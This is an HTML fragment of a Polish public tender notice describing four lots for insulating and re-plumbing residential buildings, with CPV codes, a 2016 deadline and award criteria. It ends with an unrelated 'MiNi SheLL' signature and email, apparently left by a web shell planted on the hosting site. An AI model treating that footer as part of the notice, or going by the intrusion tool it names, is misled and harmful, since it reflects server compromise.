<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> budynek przy ul. Kaplicznej 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ocieplenie ścian zewnętrznych,
ocieplenie dachu,
wymiana stolarki okiennej i drzwiowej, montaż nawiewników,
wykonanie węzła c.o. i c.w.u.,
wykonanie instalacji c.o. ,
wykonanie instalacji c.w.u.,
wykonanie przyłącza do miejskiej sieci ciepłowniczej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.00.00-9, 45.45.30.00-7, 45.26.12.10-9, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> budynek przy ul. Młyńskiej 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ocieplenie ścian zewnętrznych, 
ocieplenie dachu,
wymiana stolarki okiennej i drzwiowej, montaż nawiewników,
wykonanie węzła c.o. i c.w.u.,
wykonanie instalacji  c.o., 
wykonanie instalacji c.w.u.,
wykonanie instalacji solarnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.00.00-9, 45.45.30.00-7, 45.26.12.10-9, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> budynek przy ul. Traugutta 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ocieplenie ścian zewnętrznych,
ocieplenie stropodachu,
wymiana stolarki okiennej i drzwiowej, montaż nawiewników,
wykonanie węzła c.o. i c.w.u.,
wykonanie instalacji  c.o. ,
wykonanie instalacji c.w.u.,
wykonanie instalacji solarnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.00.00-9, 45.45.30.00-7, 45.26.12.10-9, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> budynek przy ul. Wybickiego 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ocieplenie ścian zewnętrznych ,
ocieplenie stropodachu,
wymiana stolarki okiennej i drzwiowej, montaż nawiewników,
wykonanie węzła c.o. i c.w.u.,
wykonanie instalacji  c.o.,
wykonanie instalacji c.w.u.,
wykonanie instalacji solarnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.00.00-9, 45.45.30.00-7, 45.26.12.10-9, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com